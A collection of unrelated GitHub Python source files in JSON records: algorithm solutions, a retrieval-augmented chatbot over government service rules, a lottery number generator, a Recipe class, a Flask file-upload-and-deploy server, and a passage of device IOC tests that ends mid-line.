divisions\n}\n\n\nprint(json.dumps(output))\n","repo_name":"cameojokes/classifier-scraper","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"40608007569","text":"class Solution:\n def letterCombination(self, digits):\n letterMap = {'2':'abc', '3':'def', '4':'ghi', '5':'jkl', '6':'mno','7':'pqrs','8':'tuv','9':'wxyz'}\n res = []\n if not digits:\n return res\n\n self.bfs(digits, 0, '', res, letterMap)\n return res\n\n def bfs(self, digits, index, tempRes, res, lMap):\n if index > len(digits) - 1:\n res.append(tempRes)\n return\n else:\n letters = lMap[digits[index]]\n for letter in letters:\n self.bfs(digits, index + 1, tempRes + letter, res, lMap)\n\n\n# Return all possible combination is can be achieved by Breadth-First-Search tree structure\n","repo_name":"borntoburnyo/AlgorithmInPython","sub_path":"medium/17_letter_combinations_of_a_phone_number.py","file_name":"17_letter_combinations_of_a_phone_number.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"27397576425","text":"# from .config import openaiapi, openaiorg, pinecone_api_key, pinecone_environment\nimport os\nimport openai\nimport pinecone\nimport pickle\nimport re\nimport re\nimport json\nimport time\nfrom spacy.lang.en import English\n\n\nopenaiapi = os.environ.get(\"OPENAI_API_KEY\")\nopenaiorg = os.environ.get(\"OPENAI_ORG_ID\")\npinecone_api_key = os.environ.get(\"PINECONE_API_KEY\")\npinecone_environment = os.environ.get(\"PINECONE_ENV\")\n\nopenai.api_key = openaiapi\nopenai.organization = openaiorg\n\nnlp = English() # Just the language with no model\nnlp.add_pipe(\"sentencizer\") # Adding a sentencizer pipeline component\n\n\ndef split_sentences(text):\n doc = nlp(text)\n return [sent.text for sent in doc.sents]\n\n\ndef split_into_chunks(text, max_len=800):\n sentences = split_sentences(text)\n chunks = []\n current_chunk = \"\"\n for sentence in sentences:\n if len(current_chunk) + len(sentence) <= max_len:\n current_chunk += sentence\n else:\n chunks.append(current_chunk.strip())\n current_chunk = sentence\n\n if current_chunk.strip():\n chunks.append(current_chunk.strip())\n return chunks\n\n\ndef clean_and_split_text(text):\n # Remove extra newline characters and join the text\n text = \" \".join(text.strip().split(\"\\n\"))\n # Remove page numbers\n text = re.sub(r\"\\d+\\n\", \"\", text)\n # Remove citations\n # text = re.sub(r\"(?:\\*\\s*[A-Za-z\\d*]+\\s*vide[^“]*?(?:\\n|$))\", \"\", text)\n # Identify rule titles and add a separator before them\n text = re.sub(r\"(\\d+(\\.|\\')\\.?\\s[^—]+[,—])\", r\"@@@\\1\", text)\n # Split the text based on the separator\n segments = text.split(\"@@@\")\n # Create a list to store the cleaned segments\n cleaned_segments = []\n for segment in segments:\n # Only remove extra spaces and newline characters\n segment = re.sub(r\"\\s+\", \" \", segment).strip()\n\n if len(segment) > 800:\n split_chunks = split_into_chunks(segment)\n cleaned_segments.extend(split_chunks)\n else:\n cleaned_segments.append(segment)\n cleaned_segments = [segment for segment in cleaned_segments if segment.strip()]\n return cleaned_segments\n\n\ndef write_chunks_to_file(chunks, pdf_path, namespace=None):\n # Create a 'chunks' directory if it doesn't exist\n if not os.path.exists(\"chunks\"):\n os.makedirs(\"chunks\")\n # Set the output file name using the original PDF filename\n if pdf_path:\n output_filename = os.path.splitext(os.path.basename(pdf_path))[0]\n else:\n output_filename = namespace\n output_file_path = f\"./chunks/{output_filename}_chunks.txt\"\n # Write the chunks to the output file\n with open(output_file_path, \"w\") as f:\n for idx, chunk in enumerate(chunks, start=1):\n f.write(f\"Chunk {idx}:\\n\")\n f.write(chunk)\n f.write(\"\\n\\n\")\n\n\ndef process_extracted_text(\n query,\n text,\n pdf_path,\n search_scope=\"current_file\",\n namespace=None,\n department=None,\n type_of_document=None,\n year=None,\n):\n # selecting the huggingface tokeniser and selecting the chunk sizes\n\n texts = []\n # max_length = 4000\n # overlap = 100\n\n # splitting the text into chunks using our custom function\n texts = clean_and_split_text(text)\n write_chunks_to_file(texts, pdf_path, namespace)\n\n # initialising the openai api key\n model_engine = \"text-embedding-ada-002\"\n\n # initialising pinecone\n pinecone.init(\n api_key=pinecone_api_key,\n environment=pinecone_environment,\n )\n\n # fetching the name of the created index and initialising it\n index_name = \"rajgov\"\n index = pinecone.Index(index_name)\n\n # creating embeddings of chunks and uploading them into the index\n # Get embeddings for the PDF file\n if pdf_path:\n file_name = os.path.splitext(os.path.basename(pdf_path))[0]\n else:\n file_name = namespace\n embeddings_file_path = f\"./embeddings/{file_name}_embeddings.pkl\"\n\n if namespace is None:\n namespace = file_name\n\n embeddings = []\n if not os.path.exists(embeddings_file_path):\n # creating embeddings of chunks and save them to a file\n for i, chunk in enumerate(texts):\n response = openai.Embedding.create(input=[chunk], model=model_engine)\n embedding = response[\"data\"][0][\"embedding\"]\n metadata = {\"text\": chunk}\n if department is not None:\n metadata[\"department\"] = department\n if type_of_document is not None:\n metadata[\"type_of_document\"] = type_of_document\n if year is not None:\n metadata[\"year\"] = year\n embeddings.append((f\"chunk_{i}\", embedding, metadata))\n\n with open(embeddings_file_path, \"ab\") as f:\n print(f\"Saving embeddings of chunk_{i} to {embeddings_file_path}\")\n pickle.dump([(f\"chunk_{i}\", embedding, metadata)], f)\n\n # Upserting embeddings to namespace\n index.upsert(\n vectors=[(f\"chunk_{i}\", embedding, metadata)], namespace=namespace\n )\n else:\n # load embeddings from the file\n with open(embeddings_file_path, \"rb\") as f:\n print(f\"Loading embeddings from {embeddings_file_path}\")\n while True:\n try:\n embeddings.append(pickle.load(f))\n except EOFError:\n break\n\n completed_chunks = len(embeddings)\n print(f\"Completed chunks: {completed_chunks}\")\n\n # Continue creating embeddings from where it left off\n for i, chunk in enumerate(texts[completed_chunks:], start=completed_chunks):\n response = openai.Embedding.create(input=[chunk], model=model_engine)\n embedding = response[\"data\"][0][\"embedding\"]\n metadata = {\"text\": chunk}\n if department is not None:\n metadata[\"department\"] = department\n if type_of_document is not None:\n metadata[\"type_of_document\"] = type_of_document\n if year is not None:\n metadata[\"year\"] = year\n embeddings.append((f\"chunk_{i}\", embedding, metadata))\n\n with open(embeddings_file_path, \"ab\") as f:\n print(f\"Saving embeddings of chunk_{i} to {embeddings_file_path}\")\n pickle.dump([(f\"chunk_{i}\", embedding, metadata)], f)\n\n # Upserting embeddings to namespace\n index.upsert(\n vectors=[(f\"chunk_{i}\", embedding, metadata)], namespace=namespace\n )\n\n # preparing the query\n \"\"\"query = translate_to_english_chatgpt(query)\n focus_phrases = extract_focus_phrases(query)\n print(f\"QUERY: {query}\")\"\"\"\n\n # querying the index\n query_response = openai.Embedding.create(input=[query], model=model_engine)\n query_embedding = query_response[\"data\"][0][\"embedding\"]\n\n # the response will be in json with id, metadata with text, and score\n if search_scope == \"current_file\":\n results = index.query(\n queries=[query_embedding],\n top_k=5,\n include_metadata=True,\n namespace=namespace,\n )\n else: # search_scope == 'entire_database'\n results = index.query(queries=[query_embedding], top_k=5, include_metadata=True)\n print(results)\n\n answer, search_results = chatgpt_summarize_results(\n query, results\n ) # focus_phrases,)\n\n print(f\"ANSWER: {answer}\")\n\n return answer, search_results\n\n\ndef chatgpt_summarize_results(query, results): # focus_phrases)\n search_results = \"\"\n for match in results[\"results\"][0][\"matches\"]:\n score = match[\"score\"]\n text = match[\"metadata\"][\"text\"]\n search_results += f\"{score:.2f}: {text}\\n\"\n print(search_results)\n\n response = openai.ChatCompletion.create(\n model=\"gpt-4\",\n messages=[\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant working at a government help center facilities. People ask you questions related to permissable activities,and for information on government services.\",\n },\n {\n \"role\": \"user\",\n \"content\": f\"The query is: '{query}'. Based on the following search results, provide an answer to the query, after considering each result with respect to the query and checking if anything related to the query can be inferred from each result. Finally, comment on reason for your final interpreation, as well as any additional information that may not be contained in the text that may help answer the query. considering not only exact matches but also possible inferences about the expected action that can be made based on the results. :\\n\\n{search_results}\", # You may also use the focus phrases : {focus_phrases} for better inference.\n },\n ],\n )\n\n gpt_response = response.choices[0].message[\"content\"].strip()\n\n return gpt_response, search_results\n\n\ndef chatgpt_get_response(context, query):\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\n \"role\": \"system\",\n \"content\": \"You are a helpful assistant working at a government help center facilities. People ask you questions related to permissable activities, and for information on government services.\",\n },\n {\"role\": \"user\", \"content\": context},\n {\"role\": \"user\", \"content\": query},\n ],\n )\n\n return response.choices[0].message[\"content\"].strip()\n\n\n# just as an aside, the following prompts gave 2 different results when run twice, without making any change to\n# prompt or query. One said permission can be given, the other said permission cannot be given.\n# here are the prompts\n\"\"\" for all 3 : role : system : You are a helpful assistant working at a government help center facilities. People ask you questions related to permissable activities,and for information on government services\nfor 1 : role : user : Translate the following text to English: Then give answers on what is the context of the text and what is the action expected. Finally , convert the text into an appropriate query that can be used to search through a semantic database to search through embedded text to find the right text that can give an answer on whether the action expected can be peformed within the given context. Make sure that the query is appropriate for searching through a semantic database consisting of government laws and regulations, and avoid adding those phrases to the query that may unnecessarily confuse the search engine.'\nfor 2 : role : user : Extract key phrases from the following query: Only extract the phrases related to actions that are expected (including giving permissions under existing regulations, asking for details regulations relevant to the case etc), that can be searched through a datatbase of governemnt acts and regulations. Avoid extracting phrases that are not relevant to the semantic search through a database of government rules.\nfor 3 : role : user : The query is: Based on the following search results, provide an answer to the query, after considering each result with respect to the query and checking if anything related to the query can be inferred from each result. Finally, comment on reason for your final interpreation, as well as any additional information that may not be contained in the text that may help answer the query. considering not only exact matches but also possible inferences about the expected action that can be made based on the results. You may also use the focus phrases : for better inference.:\"\"\"\n\n\n\"\"\"def split_text(text, max_chunk_size=300, overlap=50):\n pattern = r'(\\d+(\\.\\d+)*\\s*\\w*\\.?)'\n chunks = re.split(pattern, text)\n\n combined_chunks = []\n for i in range(0, len(chunks)-1, 2):\n chunk = ''\n if chunks[i]:\n chunk += chunks[i]\n if chunks[i+1]:\n chunk += chunks[i+1]\n combined_chunks.append(chunk)\n\n cleaned_chunks = [chunk.replace('\\n', ' ').strip()\n for chunk in combined_chunks]\n\n smaller_chunks = []\n for chunk in cleaned_chunks:\n rule_number_match = re.match(r'(\\d+(\\.\\d+)*)', chunk)\n if rule_number_match:\n rule_number = rule_number_match.group(1)\n chunk = re.sub(r'\\d+(\\.\\d+)*', '', chunk).strip()\n else:\n rule_number = ''\n\n tokens = chunk.split()\n\n for i in range(0, len(tokens), max_chunk_size - overlap):\n start = max(0, i - overlap) if i > 0 else i\n end = min(i + max_chunk_size, len(tokens))\n small_chunk = ' '.join(tokens[start:end])\n if rule_number:\n if start > 0:\n small_chunk = f\"{rule_number} (cont'd) \" + small_chunk\n else:\n small_chunk = f\"{rule_number} \" + small_chunk\n smaller_chunks.append(small_chunk)\n total_chunks = len(smaller_chunks)\n print(f\"Total number of chunks created: {total_chunks}\")\n return smaller_chunks\n\n\nPrevious answer :\nwith press or radio—Previous sanction of the Government shall not be required when the member of the service, in the bonafide discharge of his duties or otherwise, publishes a book or contributes to or participates in a public media. Provided that he shall observe the provisions of rules and at all times make it clear that the views expressed, are of his own and not those of the Government. 7. Criticism\n0.84: should not be given to a moS to publish articles in the journals, souvenirs etc., of political parties: - A doubt has been raised whether members of the All India Services can be permitted to publish articles in the journals, souvenirs etc., of political parties. 2. The\n0.81: 1995) 185 Provided that nothing in this rule shall apply to any statement made or views expressed by a member of the Service in his official capacity and in the due performance of the duties assigned to him. (GOI Instructions: D.P. & A.R. letter No. 11017/9/75—AlS(III), dated the 2nd March, 1976, reproduced under Miscellaneous Executive Instructions at the end of these Rules) 8. Evidence\n0.81: Government may, however, at any time disallow the officer from pursuing his application for admission of financial assistance in cases where Govt. is of the view that 207 a member of the service has utilized his official influence to obtain the same or if the Government feels that such course of action is not in the interest of the Government. [Letter No. 11017/18/91-AIS(III)dated 1.7.\n0.81: from literary, cultural or artistic efforts, which are not aided by the knowledge acquired by the member in the course of his service, is not ‘fee’ for the purpose of SR 12 and can be retained by the officer in full: - A question arose, whether a member of the service could accept royalty of the publication of a book of literary, artistic, or scientific character and also whether such royalties were to be treated as ‘Fee’ u\nPrevious query: \nCan an officer publish an article in a journal?\nPrevious final answer: \nBased on the search results, it can be inferred that a member of the service is allowed to publish a book or contribute to a public media in the bonafide discharge of his duties or otherwise, without requiring the previous sanction of the government. However, it is mandatory for the member to observe the provisions of rules and ensure that the views expressed are his own and not those of the government. It is not clear whether the query refers to a civil or police officer, but it does not seem to be prohibited unless it is a publication in a journal of a political party. It is important to note that any statements made or views expressed in the due performance of the duties assigned to him by a member of the service in his official capacity exempt him from the rule.\"\"\"\n\n\n\"\"\"def translate_to_english_chatgpt(text):\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a helpful assistant working at a government help center facilities. People ask you questions related to permissable activities,and for information on government services.\"},\n {\"role\": \"user\", \"content\": f\"Translate the following text to English: '{text}'.Then give answers on what is the context of the text and what is the action expected. Finally , convert the text into an appropriate query that can be used to search through a semantic database to search through embedded text to find the right text that can give an answer on whether the action expected can be peformed within the given context. Make sure that the query is appropriate for searching through a semantic database consisting of government, regulations,polcies, programmes and other government services, and avoid adding those phrases to the query that may unnecessarily confuse the search engine.\"}\n ]\n )\n translated_text = response.choices[0].message['content'].strip()\n print(f\"Translated text : '{translated_text}\")\n return translated_text\n\n\ndef extract_focus_phrases(translated_text):\n\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a helpful assistant working at a government help center facilities. People ask you questions related to permissable activities,and for information on government services..\"},\n {\"role\": \"user\",\n \"content\": f\"Extract key phrases from the following query: '{translated_text}'. Only extract the phrases related to actions that are expected (including giving permissions under existing regulations, asking for details within government schemes, looking for legal advice etc), that can be searched through a datatbase of governemnt acts, regulations, policies and welfare schemes. Avoid extracting phrases that are not relevant to the semantic search through such a database.\"}\n ]\n )\n focus_phrases = response.choices[0].message['content'].strip()\n print(focus_phrases)\n print(f\"Focus phrases : '{focus_phrases}\")\n return focus_phrases\"\"\"\n","repo_name":"Samoppakiks/govGPT","sub_path":"src/embedchat.py","file_name":"embedchat.py","file_ext":"py","file_size_in_byte":18265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"19103467004","text":"class Solution:\n def buddyStrings(self, s: str, goal: str) -> bool:\n swapped_chars = False\n swap_at = None\n can_swap = False\n chars_seen = set()\n \n if len(s) != len(goal):\n return False\n \n for i in range(len(s)):\n if s[i] in chars_seen:\n can_swap = True\n else:\n chars_seen.add(s[i])\n \n if s[i] == goal[i]:\n continue\n \n if swapped_chars:\n return False\n \n if swap_at is None:\n swap_at = i\n else:\n if s[swap_at] != goal[i] or s[i] != goal[swap_at]:\n return False\n swapped_chars = True\n swap_at = None\n \n if swap_at is not None:\n return False\n \n return swapped_chars or can_swap\n\n\"\"\"\nCould try swapping all combinations of 2 letters and testing equality: O(n^2) time\nFrequency mapping is not enough because order matters\nIterate over both strings. Store something as soon as I find one char that doesn't match. If I find another char that doesn't match, return false if they can't be swapped. And even if they can, return false if I find another non-match later on\n\nabcd\ndbca\n\"\"\"","repo_name":"NishantTharani/LeetcodeSolutions","sub_path":"0859-buddy-strings/0859-buddy-strings.py","file_name":"0859-buddy-strings.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"17050719933","text":"import random\r\nimport os\r\n\r\ncont = 0\r\n\r\nddz = []\r\nmega_sena = []\r\nlotofacil = []\r\n\r\nprint(\"Seja bem vindo ao Mundo das Loterias !!!!!\")\r\nprint()\r\nprint(\"Informe a sua opção Desejada.\")\r\nprint()\r\n\r\nopcao = input(\"Digite 1 Para Jogo do bicho: \\nDigite 2 Para Loterias: \")\r\nprint()\r\n\r\nif opcao == \"1\":\r\n print(\"****** Informe seu jogo ******\")\r\n jogo = input(\"Digite 1 para Centena: \\nDigite 2 para Milhar: \\nDigite 3 para DDZ: \")\r\n print(\"--------------\")\r\n print()\r\n if jogo == \"1\":\r\n centena = random.randint(000,100)\r\n print(\"A Centena Sorteada foi: \",centena)\r\n\r\n elif jogo == \"2\":\r\n milhar = random.randint(0000,9999)\r\n print(\"A Milhar Sorteada foi: \",milhar)\r\n\r\n elif jogo == \"3\":\r\n while cont != 2:\r\n sorteado = random.randint(00,99)\r\n if sorteado not in ddz:\r\n ddz.append(sorteado)\r\n cont += 1\r\n print(\"DDZ: \",ddz)\r\n\r\n '''Fim do bloco Jogo Do bicho'''\r\nelif opcao == \"2\":\r\n print(\"Informe seu jogo\")\r\n\r\n\r\n jogo = input(\"Digite 1 para Mega-Sena\\nDigite 2 Lotofácil\")\r\n if jogo == \"1\":\r\n\r\n while cont != 6:\r\n sorteado = random.randint(1,60)\r\n if sorteado not in mega_sena:\r\n mega_sena.append(sorteado)\r\n cont += 1\r\n elif sorteado in mega_sena:\r\n sorteado = random.randint(1,60)\r\n\r\n mega_sena.sort()\r\n print(\"MEGA-SENA\",mega_sena)\r\n\r\n elif jogo == \"2\":\r\n while cont != 15:\r\n sorteado = random.randint(1,25)\r\n if sorteado not in lotofacil:\r\n lotofacil.append(sorteado)\r\n cont += 1\r\n elif sorteado in lotofacil:\r\n sorteado = random.randint(1,25)\r\n\r\n lotofacil.sort()\r\n print(\"LOTOFÁCIL\",lotofacil)\r\n\r\n\r\n\r\nos.system(\"pause\")","repo_name":"wilian-tavares/Programas-Python","sub_path":"sorteio.py","file_name":"sorteio.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"25210662768","text":"\"\"\"Ad-hoc script for extracting preprocessed tweet text from datasets.\n\nPlease execute ../tweet_preprocessor.py to dataset files and obtain dataset_*_tok.csv in advance.\nThis script should be executed at under stance/data as default.\n\"\"\"\nimport logging\nimport os\nimport pandas as pd\nfrom fire import Fire\n\nlogger = logging.getLogger(__name__)\n\n\ndef extract_preprocessed(root_path='.',\n dataset_path='datasets',\n dataset_filename='dataset_tok.csv',\n output_path='preprocessed_tweets/slo',\n encoding='utf-8',\n logging_level=logging.INFO):\n \"\"\"This function extracts the raw text from the given tokenized dataset\n file. The text includes both the tweet text and the user profile\n description text. The input is assumed to have been tokenized by\n tweet_preprocessor.py. The output is written to path/filename.txt.\n\n Keyword Arguments\n :param root_path: the root system path to the target/destination files\n (default: .)\n :param dataset_path: the name of the dataset sub-directory\n (default: datasets)\n :param dataset_filename: the name of the dataset file\n (default: dataset_tok.csv)\n :param output_path: the sub-directory into which to put the results\n (default: preprocessed_tweets)\n :param encoding: the file encoding\n (default: utf-8)\n logging_level -- the level of logging to use\n (default: logging.INFO)\n \"\"\"\n logging.basicConfig(level=logging_level, format='%(message)s')\n\n dataset_filepath = f'{root_path}/{dataset_path}/{dataset_filename}'\n if not os.path.isfile(dataset_filepath):\n logger.fatal(f'\\tdataset file doesn\\'t exist: {dataset_filepath}')\n exit(-1)\n if not dataset_filename.endswith('_tok.csv'):\n logger.fatal(f'\\tdataset isn\\'t properly tokenized: {dataset_filepath}')\n exit(-1)\n\n logger.info(f'loading {dataset_filepath}...')\n df = pd.read_csv(dataset_filepath)\n output_filename = dataset_filename.split('.')[0]\n output_filepath = f'{root_path}/{output_path}/{output_filename}.txt'\n users = set()\n with open(output_filepath, 'w', encoding=encoding) as fout:\n logger.info(f'writing to {output_filepath}...')\n # Dump unique tweet and profile texts (separately).\n fout.writelines([text for text in df['tweet_t'].unique() + '\\n'])\n fout.writelines([text for text in df['profile_t'].unique() + '\\n'])\n # Older code for SemEval testing...\n # elif dataset_path == 'SemEval2016taskA':\n # # join testsplit and trainsplit\n # outp = f'preprocessed_tweets/semeval/{name}.txt'\n # with open(outp, 'a') as f:\n # f.writelines([tweet + '\\n' for tweet in df['tweet_t']])\n # print('\\t->', outp, 'with appending')\n\n\nif __name__ == '__main__':\n Fire(extract_preprocessed)\n # Example invocation:\n # python extract_preprocessed.py --path=/media/hdd_2/slo/stance --dataset_filename=dataset_20100101-20180510_tok.csv\n","repo_name":"Calvin-CS/slo-classifiers","sub_path":"stance/data/extract_preprocessed.py","file_name":"extract_preprocessed.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"12077969787","text":"\nclass Recipe:\n def __new__(cls, *args, **kwargs):\n return super().__new__(cls)\n\n # Need to hanlde type checking\n def __init__(self, name, lvl, time, ingredients, description, type):\n self.name = name\n self.cooking_lvl = lvl\n self.cooking_time = time\n self.ingredients = ingredients\n self.description = description\n self.recipe_type = type\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name):\n if isinstance(name, str):\n if name:\n self._name = name\n else:\n raise ValueError('\"name\" cannot be empty')\n else:\n raise TypeError('\"name\" must be a string')\n\n @property\n def cooking_lvl(self):\n return self._cooking_lvl\n\n @cooking_lvl.setter\n def cooking_lvl(self, cooking_lvl):\n if isinstance(cooking_lvl, int):\n if cooking_lvl >= 1 and cooking_lvl <= 5:\n self._cooking_lvl = cooking_lvl\n else:\n raise ValueError('\"cooking_lvl\" should be between 1 and 5')\n else:\n raise TypeError('\"cooking_lvl\" must be an int')\n\n @property\n def cooking_time(self):\n return self._cooking_time\n\n @cooking_time.setter\n def cooking_time(self, cooking_time):\n if isinstance(cooking_time, int):\n if cooking_time > 0:\n self._cooking_time = cooking_time\n else:\n raise ValueError('\"cooking_time\" should be positive')\n else:\n raise TypeError('\"cooking_time\" must be an int')\n\n @property\n def ingredients(self):\n return self._ingredients\n\n @ingredients.setter\n def ingredients(self, ingredients):\n if isinstance(ingredients, list):\n if not ingredients:\n raise ValueError('\"ingredients\" cannot be empty')\n if not all(i for i in ingredients):\n raise ValueError('\"ingredients\" cannot contain empty values')\n if not all(isinstance(i, str) for i in ingredients):\n raise TypeError('\"ingredients\" should contain strings')\n self._ingredients = ingredients\n else:\n raise TypeError('\"ingredients\" must be a list')\n\n @property\n def description(self):\n return self._description\n\n @description.setter\n def description(self, description):\n if isinstance(description, str):\n self._description = description\n else:\n raise TypeError('\"description\" must be a string')\n\n @property\n def recipe_type(self):\n return self._recipe_type\n\n @recipe_type.setter\n def recipe_type(self, recipe_type):\n if isinstance(recipe_type, str):\n if not recipe_type:\n raise ValueError('\"recipe_type\" cannot be empty')\n if recipe_type in [\"starter\", \"lunch\", \"dessert\"]:\n self._recipe_type = recipe_type\n else:\n raise ValueError(\n '\"type\" must be in [\"starter\", \"lunch\", \"dessert\"]')\n else:\n raise TypeError('\"recipe_type\" must be a string')\n\n def __str__(self):\n \"\"\"Return the string to print with the recipe info\"\"\"\n txt = f\"{self.name} is a level {self.cooking_lvl} recipe.\\n\"\n txt += f\"You will need {self.cooking_time} mins \"\n txt += f\"and these ingredients {self.ingredients} to complete it.\\n\"\n txt += f\"This dish is usually served as {self.recipe_type}.\\n\"\n if self.description:\n txt += f\"Additional details:\\n{self.description}\\n\"\n return txt\n","repo_name":"cnstll/PythonBasics","sub_path":"Module_01/ex00/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"43083149273","text":"# encoding=utf8\nfrom __future__ import with_statement\nimport json\nimport time\nimport traceback\nimport os\nfrom flask import Flask\nfrom flask import Flask, session, jsonify, send_from_directory\nfrom flask_restful import request\nfrom flask_restful import Resource, Api, abort\nfrom flask_restful import reqparse\n\napp = Flask(__name__)\napi = Api(app)\napp.config.update(RESTFUL_JSON=dict(ensure_ascii=False))\n\n\n\nupload_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"upload\")\nif os.path.exists(upload_path):\n print('upload dir exist')\nelse:\n os.mkdir(upload_path)\n print('mkdir upload dir success')\n\nparser = reqparse.RequestParser()\n\n@app.route('/')\ndef index():\n return send_from_directory(os.path.dirname(os.path.abspath(__file__)),'upload.html')\n\ndef unzip_deploy(filename):\n os.system('unzip upload/' + filename)\n os.system('mv Edbox_JSLibs libs')\n unix_time = str(int(time.time()) * 100)\n os.system('mv 235/libs 235/xxxx && mv 234/libs 234/xxxx && mv 233/libs 233/xxxx '.replace('xxxx',unix_time))\n os.system('cp -R libs 235/ && cp -R libs 234/ && mv libs 233/')\n\n\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n # if request.method == 'POST':\n if request.method == 'POST':\n f = request.files['file'] # 从表单的file字段获取文件,file为该表单的name值\n fname = f.filename\n if f: # 判断是否是允许上传的文件类型\n print(fname)\n ext = fname.rsplit('.', 1)[1] # 获取文件后缀\n unix_time = str(int(time.time())*100)\n new_filename = 'upload_' + unix_time + '.' + ext # 修改上传的文件名\n f.save(os.path.join(upload_path, new_filename)) # 保存文件到upload目录\n try:\n unzip_deploy(new_filename)\n except:\n traceback.print_exc()\n return \"deploy file error\"\n result = {'oldfile': fname,'newfile': new_filename, 'success': 1}\n return json.dumps(result)\n else:\n result = {'file': fname, 'success': 0,'reason':'file type illegal'}\n return json.dumps(result)\n\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=9999, debug=True)","repo_name":"tomgiggs/helloPython","sub_path":"webservers/upload_server.py","file_name":"upload_server.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"7652909108","text":"\"\"\"\nQUESTION 1:\nSwap the case of the string that comes as an input and return the string while making sure that the first letter of the string stays Uppercase.\nExample -\n\nInput - \"PyThON\"\n\nOutput - \"PYtHon\"\n\"\"\"\ndef main(i):\n result = \"\"\n for ch in range(len(i)):\n if ch == 0:\n result += i[ch].upper()\n elif i[ch].islower():\n result += i[ch].upper()\n else:\n result += i[ch].lower()\n return result","repo_name":"mohit266/Python-course-Edugrad","sub_path":"Edugrad_1.py","file_name":"Edugrad_1.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"17003271093","text":"import unittest\nfrom time import sleep\n\nfrom parameterized import parameterized\n\nfrom utils.channel_access import ChannelAccess\nfrom utils.ioc_launcher import get_default_ioc_dir\nfrom utils.test_modes import TestModes\nfrom utils.testing import get_running_lewis_and_ioc, skip_if_recsim, unstable_test\n\nDEVICE_PREFIX = \"JSCO4180_01\"\nDEVICE_NAME = \"jsco4180\"\n\nIOCS = [\n {\n \"name\": DEVICE_PREFIX,\n \"directory\": get_default_ioc_dir(\"JSCO4180\"),\n \"macros\": {},\n \"emulator\": DEVICE_NAME,\n },\n]\n\nTEST_MODES = [TestModes.DEVSIM]\n\nERROR_STATE_HARDWARE_FAULT = 4\nERROR_STATE_NO_ERROR = 2\n\nrequired_pvs = [\"COMP:A:SP\", \"COMP:B:SP\", \"COMP:C:SP\", \"START:SP\", \"STATUS\", \"FLOWRATE:SP\", \"TIME:RUN:SP\",\n \"PRESSURE:MIN:SP\", \"PRESSURE:MAX:SP\", \"ERROR:SP\", \"ERROR:STR\", \"PUMP_FOR_TIME:SP\"]\n\n\nclass Jsco4180Tests(unittest.TestCase):\n \"\"\"\n Tests for the Jsco4180 IOC.\n \"\"\"\n\n def setUp(self):\n self._lewis, self._ioc = get_running_lewis_and_ioc(DEVICE_NAME, DEVICE_PREFIX)\n self.ca = ChannelAccess(device_prefix=DEVICE_PREFIX, default_timeout=30, default_wait_time=0.0)\n for pv in required_pvs:\n self.ca.assert_that_pv_exists(pv, timeout=30)\n self._lewis.backdoor_run_function_on_device(\"reset\")\n\n def test_GIVEN_wrong_component_on_device_WHEN_running_THEN_retry_run_and_updates_component(self):\n expected_value_A = 30\n expected_value_B = 15\n expected_value_C = 55\n\n self.ca.set_pv_value(\"COMP:A:SP\", expected_value_A)\n self.ca.set_pv_value(\"COMP:B:SP\", expected_value_B)\n self.ca.set_pv_value(\"COMP:C:SP\", expected_value_C)\n\n self.ca.set_pv_value(\"START:SP\", 1)\n\n sleep(10)\n # Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components.\n self._lewis.backdoor_set_on_device(\"component_A\", 25)\n self._lewis.backdoor_set_on_device(\"component_B\", 10)\n self._lewis.backdoor_set_on_device(\"component_C\", 14)\n\n self.ca.assert_that_pv_is(\"COMP:A\", expected_value_A, timeout=30)\n self.ca.assert_that_pv_is(\"COMP:B\", expected_value_B, timeout=30)\n self.ca.assert_that_pv_is(\"COMP:C\", expected_value_C, timeout=30)\n\n # there was a previous problem where if setpoint and readback differed a sleep and resend was started,\n # but the old state machine did not look to see if a new sp was issued while it was asleep and so then\n # resent the old out of date SP\n @unstable_test(max_retries=2, wait_between_runs=60)\n def test_GIVEN_wrong_component_on_device_WHEN_send_new_sp_THEN_state_machine_aborts_resend(self):\n value = 50\n self.ca.set_pv_value(\"COMP:A:SP\", value)\n self.ca.set_pv_value(\"COMP:B:SP\", value)\n self.ca.set_pv_value(\"START:SP\", 1)\n self.ca.assert_that_pv_is(\"STATUS\", \"Pumping\", timeout=5)\n self.ca.assert_that_pv_is(\"COMP:A\", value, timeout=30)\n self.ca.assert_that_pv_is(\"COMP:B\", value, timeout=30)\n\n # Setting an incorrect component on the device will result in the state machine attempting\n # to rerun the pump and reset components after a delay\n initial_delay = self.ca.get_pv_value(\"ERROR:DELAY\") # delay before state machine reset\n delay = 30 # Increase delay to avoid race conditions\n self.ca.set_pv_value(\"ERROR:DELAY\", delay)\n try:\n with 